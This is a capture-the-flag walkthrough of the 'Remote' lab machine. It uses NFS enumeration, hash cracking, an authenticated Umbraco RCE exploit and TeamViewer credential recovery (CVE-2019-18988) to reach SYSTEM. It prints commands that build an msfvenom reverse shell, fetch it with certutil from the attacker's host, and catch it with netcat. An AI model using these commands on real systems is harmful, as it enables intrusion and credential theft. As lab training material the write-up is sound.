# Remote

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-29d4a2c7b9970f0a5ff771c637e28faca5597dce%2Fimage.png?alt=media)

## Scanning and Enumeration

### Nmap

```
nmap 10.10.10.180  -p- -v -sS -T4 -sV

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp   open  rpcbind       2-4 (RPC #100000)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

After this we can attempt to fingerprint the OS with the `smb-os-discovery` script and the `-O` switch. Nmap's best guess is Windows 10 1709 - 1909, but note the caveat at the bottom of the output: there is no exact match and the test conditions were non-ideal, so treat the guess as indicative only.

```
nmap 10.10.10.180  -O -p 135,139,445 -sV --script=smb-os-discovery


PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Aggressive OS guesses: Microsoft Windows 10 1709 - 1909 (93%), Microsoft Windows Server 2012 (92%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows 10 1709 - 1803 (91%), Microsoft Windows 10 1809 - 1909 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

### Port 21 FTP

As port 21 is open we can check for anonymous login with the Nmap script `ftp-anon`:

```
nmap 10.10.10.180 -p 21 --script=ftp-anon.nse

PORT   STATE SERVICE
21/tcp open  ftp
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
```

I logged in as the anonymous user and looked for files, including hidden ones, but found nothing at all. I then tested file upload and was given access denied.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e453736be944b22eeec3034aadf91945be4e874f%2Fimage.png?alt=media)

### Port 80

We have a web server running on port 80. Navigating to the root page brings us to the following:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2784562618680ebfba9af305215dfeeaccf5aaa2%2Fimage.png?alt=media)

Before proceeding, let's run a directory brute force against the web server. I will be using [`feroxbuster`](https://github.com/epi052/feroxbuster) for this.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-641d1aef44a090735a8ec45d9ae069d39a98910e%2Fimage.png?alt=media)

Scrolling down the root page we see some recent posts mentioning Umbraco.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-789ba248b9c48a5648f083568dcfa7016dda9c6b%2Fimage.png?alt=media)

The Wappalyzer extension for Firefox also confirms the website is running Umbraco.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3e5ec74fe5ca09ef35c0486ed4fd3009afcaba5a%2Fimage.png?alt=media)

At this point I have manually looked through the website further and was unable to find anything else of interest. Going back to our earlier nmap scan, port 2049 is also open.

### Port 2049 mountd

`mountd` is the mount daemon for the Network File System (NFS). We can use `showmount -e` to list the directories a remote host exports, together with the clients that are allowed to mount them.

```
showmount -e 10.10.10.180
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5c836470b9b9a79f5112b9b43d963428b0e12825%2Fimage.png?alt=media)
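When there are many hosts to enumerate, the `showmount -e` output is worth triaging programmatically. The following is an added example, not code from the original writeup: a small parser for `showmount -e` text that flags exports any client may mount. The sample output embedded in it is constructed for illustration (a Windows NFS server prints `(everyone)` for an unrestricted export, a Linux server prints `*`); nothing in it is taken from the real share.

```python
import re

# Constructed sample of `showmount -e` output (the page only shows a screenshot).
SAMPLE_SHOWMOUNT = """\
Export list for 10.10.10.180:
/site_backups (everyone)
/restricted   10.10.14.0/24,admin.htb.local
"""

# "<export path> <client list>"; the client list may contain spaces in parentheses.
EXPORT_LINE = re.compile(r"^(?P<path>\S+)\s+(?P<clients>.+?)\s*$")


def parse_showmount(output):
    """Parse `showmount -e` text into a list of (export_path, [client, ...]).

    The "Export list for ..." header is skipped. Client lists are comma
    separated; "(everyone)" (Windows) or "*" (Linux) means unrestricted.
    """
    exports = []
    for line in output.splitlines():
        line = line.strip()
        if not line or line.lower().startswith("export list"):
            continue
        m = EXPORT_LINE.match(line)
        if not m:
            continue
        clients = [c.strip() for c in m.group("clients").split(",") if c.strip()]
        exports.append((m.group("path"), clients))
    return exports


def is_world_readable(clients):
    """True when the export is not restricted to specific hosts or networks."""
    return any(c.strip("()").lower() in ("everyone", "*") for c in clients)


def triage_exports(output):
    """Return the export paths any client can mount: the ones to mount first."""
    return [path for path, clients in parse_showmount(output)
            if is_world_readable(clients)]


if __name__ == "__main__":
    for path in triage_exports(SAMPLE_SHOWMOUNT):
        print(f"[!] unrestricted export: {path}")
```

An export listed as `(everyone)` is readable by any host that can reach port 2049, which is exactly why a backup share like this one is a finding on its own, before anything inside it is examined.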

In preparation for mounting the share, create a directory to use as the mount point. I created `/tmp/remotemount`.

Run the following command to mount the share (`mount` needs the filesystem type, and mounting requires root):

```
sudo mount -t nfs 10.10.10.180:/site_backups /tmp/remotemount/
```

We can then use `df -k` (or `mount | grep nfs`) to list mounted filesystems and confirm the mount worked.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c631924f5661cef921acccfbe8c5b86a80baab1d%2Fimage.png?alt=media)

We can now move into the directory.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4eebd0b9530c80e8b4599842a86c4a7b3a86cac4%2Fimage.png?alt=media)

At this point I had spent some time browsing the mounted directory without finding anything interesting. Since we are dealing with a large number of folders we need a way to go through every file and pick out potentially interesting information.

As `App_Data` usually contains interesting information (for Umbraco it holds the site database), I will begin by recursively grepping the mounted tree for keywords. `grep -r` recurses into every file under the given path, so no `ls` or `cat` pipeline is needed, and `-i` makes the match case-insensitive:

```
grep -ri username .
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a52533cb397740c989ffa0a57c0feefd2f968f55%2Fimage.png?alt=media)

The output is quite large so I have only taken a snippet but we have gained the following information from this:

| Usernames          | Passwords         |
| ------------------ | ----------------- |
| <Admin@htb.local>  | Umbracoadmin123!! |
| <ssmith@htb.local> |                   |

Before we look for where to use these credentials, let's grep for the usernames themselves to see whether these accounts appear anywhere else in the backup.

```
grep -ri ssmith .
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4adc1147d6d2ad85b4201918ca5ab9a42279be08%2Fimage.png?alt=media)

We get similar results this time, plus a line at the bottom stating "Binary file Umbraco.sdf matches".

Since `Umbraco.sdf` is a binary file (a SQL Server Compact database, which for Umbraco holds the user table), we can run `strings` on it and grep the output.

```
strings Umbraco.sdf | grep ssmith
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-809ce24944c16cfb0bad652f1203b44f611f18fa%2Fimage.png?alt=media)
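Alternating by hand between `grep -r` and `strings | grep` gets tedious on a backup this size. Below is an added example (not code from the original writeup) that automates both steps in Python: it walks a directory tree, greps text files for keywords, and for binary files such as `Umbraco.sdf` falls back to `strings`-style extraction and reports e-mail addresses together with any hex digest stored next to them. `build_sample_backup()` creates a constructed stand-in for the share (a Web.config-style file and a fake `.sdf`); the file contents, the `ssmith` mail entry and the `abab…` digest are invented for the demonstration.

```python
import os
import re
import tempfile

# Keywords to grep for in text files (the page greps for "username").
KEYWORDS = ("username", "password", "connectionstring")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Raw hex digests of SHA-256 / SHA-1 / MD5 length, not embedded in a longer hex run.
HEX_DIGEST_RE = re.compile(
    r"(?<![0-9a-fA-F])(?:[0-9a-fA-F]{64}|[0-9a-fA-F]{40}|[0-9a-fA-F]{32})(?![0-9a-fA-F])")
# What `strings` extracts by default: runs of 4+ printable ASCII bytes.
PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{4,}")


def is_binary(data):
    """grep's heuristic: a NUL byte in the first block marks a binary file."""
    return b"\x00" in data[:8192]


def extract_strings(data):
    """`strings`-equivalent for a byte blob."""
    return [m.group().decode("ascii") for m in PRINTABLE_RE.finditer(data)]


def hunt(root):
    """Walk `root` and return (relative_path, kind, detail) findings.

    Text files are searched line by line for KEYWORDS (case-insensitive, like
    grep -ri). Binary files are reduced to printable strings; each e-mail
    address is reported with any hex digest among the neighbouring strings,
    which is how a user record shows up in `strings Umbraco.sdf`.
    """
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                data = fh.read()
            if is_binary(data):
                strs = extract_strings(data)
                for i, s in enumerate(strs):
                    if not EMAIL_RE.search(s):
                        continue
                    window = " ".join(strs[max(0, i - 2):i + 3])
                    for digest in HEX_DIGEST_RE.findall(window):
                        hits.append((rel, "binary", f"{s} {digest}"))
            else:
                text = data.decode("utf-8", errors="replace")
                for lineno, line in enumerate(text.splitlines(), 1):
                    if any(k in line.lower() for k in KEYWORDS):
                        hits.append((rel, "text", f"{lineno}: {line.strip()}"))
    return hits


def build_sample_backup():
    """Constructed stand-in for the site_backups share (not its real contents):
    a Web.config-style text file and a fake Umbraco.sdf containing NUL bytes."""
    root = tempfile.mkdtemp(prefix="site_backups_")
    os.makedirs(os.path.join(root, "App_Data"))
    with open(os.path.join(root, "Web.config"), "w", encoding="utf-8") as fh:
        fh.write('<add key="umbracoConfigurationStatus" value="7.12.4" />\n'
                 '<network host="mail.htb.local" userName="ssmith@htb.local" password="not-the-real-one" />\n')
    fake_sdf = (b"\x00" * 16 + b"admin\x00admin@htb.local\x00"
                + b"ab" * 20 + b"\x00{\"hashAlgorithm\":\"SHA1\"}\x00")
    with open(os.path.join(root, "App_Data", "Umbraco.sdf"), "wb") as fh:
        fh.write(fake_sdf)
    return root


if __name__ == "__main__":
    for rel, kind, detail in hunt(build_sample_backup()):
        print(f"[{kind}] {rel}: {detail}")
```

Point `hunt()` at the mount point (`/tmp/remotemount`) to run it against the real share; the binary branch is what surfaces the admin record, the text branch what surfaces configuration files.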

Lets check if we can find anything for the admin account in this file.

```
strings Umbraco.sdf | grep admin@htb.local
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-208f6a742ebe89b7785ac5ffb05695e05779bb5f%2Fimage.png?alt=media)

The output suggests a SHA-1 hash (40 hex characters). We can double-check this using hash-identifier.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a8275793e46c2a7c125c544d06de9fa4330e3013%2Fimage.png?alt=media)

I put the hash in a text file and ran John the Ripper against it with rockyou. John auto-detects Raw-SHA1 for a 40-hex-character hash, but specifying the format explicitly avoids the ambiguity warning:

```
john --format=Raw-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt /home/kali/Desktop/hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-89b8d448b6519ec56f4212456b40a1ec3c60fc8e%2Fimage.png?alt=media)

We have obtained the credentials `admin@htb.local:baconandcheese`.

Going back to feroxbuster, one of the directories it discovered is `/install`. Heading over to this URL we are presented with the following login page, which accepts the credentials we have found.

![Logon screen at /install](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-49a009b82c419e5e59a4caad02df94943cdefbd6%2Fimage.png?alt=media)

![After logging in](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d5ef2c8f7aec323a4a53eb034af9d280f24f7270%2Fimage.png?alt=media)

Clicking Help in the bottom left shows the running version of Umbraco.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-da2d28df3083103a96865872d4f98eefc26cc44d%2Fimage.png?alt=media)

At this point I went to Google, searched for "Umbraco 7.12.4 Windows exploit" and came across this:

{% embed url="<https://packetstormsecurity.com/files/158712/Umbraco-CMS-7.12.4-Remote-Code-Execution.html>" %}

I downloaded the Python script and ran a test command to check that it works. This is an authenticated exploit, so it needs the back-office credentials recovered above:

```
python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c ipconfig
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-80e821920f13b2fe9416f1122df19236507ca5d0%2Fimage.png?alt=media)

Now that we have command execution we want a proper reverse shell, which is far more convenient than one-off commands through the exploit. I created a payload with `msfvenom` as below (the output name must match the file name used in the download step later):

```
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=4455 -f exe -o /home/kali/scripts/windows/reverseshell.exe
```

After this was created I hosted a Python web server in the directory where the payload is stored (binding port 80 needs root):

```
sudo python3 -m http.server 80
```

After this we can run the exploit to download the file and place it in a world-writable directory. The web root the exploit executes from is not writable by the account we are running as, so `C:\Users\Public` is used instead.

```
python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c cmd.exe -a '/c certutil.exe -urlcache -split -f http://10.10.14.14/reverseshell.exe c:/users/public/reverseshell.exe'
```

Once this has completed we can confirm the download from our Python server's log (a `200` for `/reverseshell.exe` from 10.10.10.180). If in doubt, running `certutil.exe -hashfile c:\users\public\reverseshell.exe SHA256` through the exploit and comparing it with `sha256sum` of the local file confirms the payload arrived intact.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-caa9e25c1452d4867326012d3645d34b2ad53971%2Fimage.png?alt=media)

After this we need to set up a `netcat` listener on our attacking machine on the port the payload was built with.

```
nc -lvp 4455
```

Once this is set up we can run the exploit again, this time executing the `msfvenom` payload we placed in `C:\Users\Public` earlier on.

```
python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c cmd.exe -a '/c c:/users/public/reverseshell.exe'
```

Once this is run we should get a call back on our listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-7d1fe18f402b74718ccb65007319d03a47bd2365%2Fimage.png?alt=media)

As per standard practice I transferred over `winPEAS.exe` using `certutil.exe` and ran it. It reported TeamViewer 7 as an installed application. Knowing that 7 is an old version of TeamViewer I went to Google to research exploits.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-920f59f4afb7c21c4ec80f1f4452420859ca8de7%2Fimage.png?alt=media)

Searching for exploits for this version we come across the following, which has a CVSS score of 7.0.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6a69462af0565625c638b07c050c2c989e80e097%2Fimage.png?alt=media)

{% embed url="<https://nvd.nist.gov/vuln/detail/CVE-2019-18988>" %}

We also find a brilliant blog post covering this vulnerability.

{% embed url="<https://whynotsecurity.com/blog/teamviewer/>" %}

If we search for the CVE number on GitHub we come across multiple PoC scripts. In this case I will be using the PowerShell script "WatchTV" by zaphoxx.

{% embed url="<https://github.com/zaphoxx/WatchTV>" %}

I downloaded the script onto the victim machine, loaded it into PowerShell and ran the command `Get-TeamViewPasswords`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-21d4a2d58c845c7c85f0921bd267b4d35fb6fde5%2Fimage.png?alt=media)

We retrieve the password `!R3m0te!`.

With this we are hoping for password reuse, so we try it against the accounts we already know over SMB, since port 445 is open.

For access I have covered Impacket's `psexec.py` before, so this time I will instead use the Metasploit module `exploit/windows/smb/psexec`. Load the module and set the required options (RHOSTS, SMBUser, SMBPass and the payload's LHOST/LPORT).

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a1cdeb8f39f80d07bf3722ed6ec4cf4607ba7f2a%2Fimage.png?alt=media)

We now have access as SYSTEM and can grab both the user and root flags.

